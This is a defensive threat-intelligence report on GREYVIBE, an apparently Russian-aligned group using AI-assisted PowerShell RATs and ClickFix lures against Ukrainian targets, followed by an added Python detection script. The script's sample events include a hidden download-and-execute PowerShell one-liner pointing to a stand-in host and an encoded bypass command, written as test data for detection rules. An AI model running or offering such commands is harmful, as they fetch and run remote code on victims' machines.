Full Report
A previously undocumented threat actor dubbed GREYVIBE has been attributed to ongoing and persistent attacks targeting Ukraine and Ukraine-related entities since at least August 2025. GREYVIBE, per WithSecure, is assessed to be a Russian-speaking group operating broadly in the Russian time zone, with the activities aligning with Kremlin state interests, specifically when it comes to
Analysis Summary
# Threat Actor: GREYVIBE
## Attribution & Identity
- **Name:** GREYVIBE
- **Origin:** Assessed as a Russian-speaking group operating within Russian time zones.
- **Affiliation:** Activities align with Kremlin state interests. The group contains members believed to be current or former participants in the Russian cybercrime ecosystem.
- **Sophistication:** Characterized as a "low-to-moderately sophisticated group" that relies on AI-assisted tooling to bridge technical gaps but suffers from operational security (OPSEC) blunders.
## Activity Summary
GREYVIBE has been active since at least August 2025, conducting persistent cyber-espionage campaigns primarily aimed at intelligence gathering related to the Russo-Ukrainian war. They are notable for using Generative AI (GenAI) and Large Language Models (LLMs) to develop malware, generate bait images, and refactor code to evade traditional detection.
## Tactics, Techniques & Procedures
- **AI-Augmented Development:** Usage of ChatGPT, Google Gemini, and Ideogram AI for malware development, obfuscation scripts, and social engineering lures.
- **Social Engineering:** Use of spear-phishing, fake CAPTCHA pages (ClickFix style), and fraudulent adult-club or charitable websites.
- **Phishing Lures:** Masquerading as services like Zoom, LAPAS, and charitable foundations supporting the Armed Forces of Ukraine.
- **Execution:** Deployment of JavaScript-based loaders via malicious ZIP/RAR archives hosted on cloud platforms.
- **Persistence:** Implementation of custom watchdog mechanisms in PowerShell scripts.
- **Data Exfiltration:** Exfiltration of browser data, Telegram/WhatsApp communications, and system profiling.
- **Audio/Video Capture:** Use of WebRTC features to capture live audio and video from victims.
## Targeting
- **Sectors:** Military, Government, Civilian, and Business-related organizations.
- **Geography:** Ukraine and Ukraine-related entities.
- **Victims:** Ukrainian military personnel (via fake login screens) and donors supporting the Ukrainian Armed Forces.
## Tools & Infrastructure
- **Malware Families:**
- **PhantomRelay / PhantomRelayV1:** PowerShell-based Remote Access Trojan (RAT).
- **LegionRelay:** Lightweight PowerShell RAT (developed with AI assistance) for file exfiltration and RDP setup.
- **FallSpy:** Android spyware for data harvesting.
- **WireGuard:** Legitimate VPN software, not a malware family, repurposed in the "DroneLink" campaign.
- **Infrastructure:**
- **Payload Hosting:** Google Drive and 4sync, used to host the malicious ZIP/RAR archives.
- **Fake Domains:** Bogus sites masquerading as Zoom, LAPAS, and "PrincessClub" adult sites.
- **Reference (source article, not an indicator):**
- hxxps[://]thehackernews[.]com/2025/08/clickfix-malware-campaign-exploits[.]html
- **Artifacts:** JavaScript-based loaders and PowerShell scripts; no file hashes or domains are reproduced in this summary.
## Implications
GREYVIBE represents a shift in threat actor evolution where lower-tier actors use AI to "supercharge" their operations. While the group makes significant OPSEC errors and introduces design flaws via AI-generated code, their ability to rapidly refactor and replace operational components makes traditional artifact-based clustering more difficult for defenders. Their alignment with state interests suggests they function as a hybrid entity between cybercrime and state-sponsored espionage.
## Mitigations
- **Script Block Logging & Monitoring:** PowerShell execution policy is not a security boundary (a loader simply passes `-ep bypass`), so rely on logging and control instead: enable Script Block Logging (Event ID 4104) and Module Logging, keep AMSI active, and alert on PowerShell or `wscript.exe`/`cscript.exe` launched from `explorer.exe` with hidden-window, encoded-command or download-and-execute arguments, or from user-writable paths such as `%TEMP%` and Downloads.
- **User Training:** Educate users on "ClickFix" tactics, where a fake CAPTCHA or error page instructs them to paste a clipboard-loaded command into the Run dialog (Win+R) or a terminal; no legitimate verification step asks for this.
- **Mobile Security:** Deploy Mobile Threat Defense (MTD) to identify and block Android spyware like FallSpy.
- **Cloud Access Control:** Restrict or monitor downloads from public file-sharing services like Google Drive and 4sync in high-risk environments.
- **Infrastructure Blocking:** Block or sinkhole newly registered domains imitating collaboration software (Zoom, etc.) and the charitable foundations used as lures.
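As an added example of the monitoring advice above (this is not code from WithSecure or The Hacker News), the following Python pass runs three detection rules over Sysmon Event ID 1-style process-creation records: a ClickFix one-liner pasted into the Run dialog (hidden-window, download-and-execute PowerShell with `explorer.exe` as parent), a JavaScript loader executed directly out of an archive, and a script engine spawning PowerShell. The event records, domain and file names are constructed for illustration; the indicator strings are generic ClickFix and loader tradecraft, not indicators taken from the report.

```python
"""Toy process-creation detections for the ClickFix and JS-loader patterns.
Added example; field names follow Sysmon Event ID 1 (Image, ParentImage,
CommandLine). All sample events below are constructed, not real telemetry."""
import json
import re
from pathlib import PureWindowsPath

# Constructed sample events as JSON lines (the .example domain is reserved).
SAMPLE_EVENTS = r'''
{"id": 1, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell -w hidden -nop -c \"iex (irm https://captcha-check.example/verify)\""}
{"id": 2, "Image": "C:\\Windows\\System32\\wscript.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\u\\AppData\\Local\\Temp\\Temp1_Zoom_Invite.zip\\Zoom_Invite.js\""}
{"id": 3, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\System32\\wscript.exe", "CommandLine": "powershell.exe -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"}
{"id": 4, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\System32\\svchost.exe", "CommandLine": "powershell.exe -File C:\\ProgramData\\Scripts\\inventory.ps1"}
{"id": 5, "Image": "C:\\Windows\\System32\\notepad.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "notepad.exe C:\\Users\\u\\notes.txt"}
'''

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}
SCRIPT_ENGINES = {"wscript.exe", "cscript.exe"}

# Flags and cmdlets typical of a ClickFix one-liner pasted into Win+R.
CLICKFIX_PATTERNS = [
    re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?", re.I),          # hidden window
    re.compile(r"\biex\b|invoke-expression", re.I),                 # execute fetched text
    re.compile(r"\birm\b|invoke-restmethod|invoke-webrequest|downloadstring", re.I),
    re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),  # base64 payload
]
# Explorer's built-in ZIP handling extracts a double-clicked file to
# %TEMP%\Temp1_<archive>.zip\; WinRAR uses %TEMP%\Rar$...\ (assumed patterns).
ARCHIVE_TEMP_PATH = re.compile(r"\\Temp\\(?:Temp1_[^\\]+\.zip|Rar\$[^\\]+)\\", re.I)


def basename(path):
    """Lower-cased file name of a Windows path, tolerating surrounding quotes."""
    return PureWindowsPath(path.strip('"')).name.lower()


def detect(event):
    """Return the names of the rules a single process-creation event matches."""
    hits = []
    image = basename(event["Image"])
    parent = basename(event["ParentImage"])
    cmd = event["CommandLine"]

    # Rule 1: the Run dialog is hosted by explorer.exe, so a hidden,
    # download-and-execute PowerShell one-liner parented by explorer.exe is
    # the user pasting what the fake CAPTCHA told them to. Two or more of the
    # patterns are required to keep ordinary '-w hidden' admin scripts quiet.
    if image in SCRIPT_HOSTS and parent == "explorer.exe":
        score = sum(1 for p in CLICKFIX_PATTERNS if p.search(cmd))
        if score >= 2:
            hits.append("clickfix_run_dialog")

    # Rule 2: a .js/.vbs opened straight out of an archive in Explorer.
    if image in SCRIPT_ENGINES and ARCHIVE_TEMP_PATH.search(cmd):
        hits.append("js_loader_from_archive")

    # Rule 3: the JS loader handing off to the PowerShell stage.
    if image in SCRIPT_HOSTS and parent in SCRIPT_ENGINES:
        hits.append("script_engine_spawns_powershell")
    return hits


def scan(jsonl):
    """Map event id -> matched rules for every event in a JSON-lines string."""
    results = {}
    for line in jsonl.strip().splitlines():
        event = json.loads(line)
        hits = detect(event)
        if hits:
            results[event["id"]] = hits
    return results


if __name__ == "__main__":
    for event_id, rules in scan(SAMPLE_EVENTS).items():
        print(f"event {event_id}: {', '.join(rules)}")
```

Events 4 and 5 (a scheduled inventory script and Notepad) produce no hits, which is the point of keying rule 1 on the parent process and a pattern count rather than on `powershell.exe` alone; in production the same rules map onto a SIEM query against Sysmon Event ID 1 or Security Event ID 4688 with command-line auditing enabled.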